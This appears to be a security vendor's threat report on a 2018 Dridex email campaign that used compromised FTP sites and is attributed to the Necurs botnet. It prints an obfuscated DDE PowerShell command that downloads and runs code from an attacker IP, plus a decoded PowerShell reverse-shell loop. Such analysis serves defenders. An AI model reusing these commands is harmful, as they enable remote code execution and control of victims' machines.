Share this…

Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP link as download locations for malicious documents, exposing the credentials of the compromised FTP sites in the process.

The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top level domains (TLDs) with the second, third and fourth top affected TLDs suggesting that major regional targets were France, the UK, and Australia respectively:

The sender domains used are observed to be compromised accounts. The sender names rotated around the following names, perhaps to make the emails look more convincing to unsuspecting recipients:


Below is a sample malicious email:

The campaign used two types of documents. The first is a DOC that abuses DDE to execute the following shell command to download malware:

c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('https://185.176.221[.]146/download/s/GTz')

The above link downloads a B64 encoded string that decodes to the following download code:

while (1 -eq 1)
     $ErrorActionPreference = 'Continue';
     $zcl=New-Object Net.Sockets.TCPClient("",443);
     while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0)
       $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
       $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
     Start-Sleep -s 10;

The second type is a XLS file with a Macro that downloads Dridex from the following location:


It is then executed using the following command:

cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe


The compromised servers do not appear to be running the same FTP software; as such, it seems likely that the credentials were compromised in some other way.

The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement.

Multiple attributes of the campaign suggest that it may coming from the Necurs botnet:

  • The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns;
  • Necurs is historically known to spread Dridex;
  • The document downloaders are also similar to those used by Necurs in the past;
  • The download locations of the XLS file also follows the traditional Necurs format.

However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change.


Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) – Malicious e-mails associated with this attack are identified and blocked.
Stage 5 (Dropper File) – Mallicious files are prevented from being downloaded.
Stage 6 (Call Home) – Attempts by Dridex to contact its C&C server are blocked.


Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to prevent being detected by email gateways and network policies that may consider FTPs as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly updating passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same.

Although there are attributes of the campaign that suggest it is coming from Necurs, the size of the campaign is more or less ‘average’. Given Necurs’ typical association with very large campaigns, the reason for this remains something of a mystery.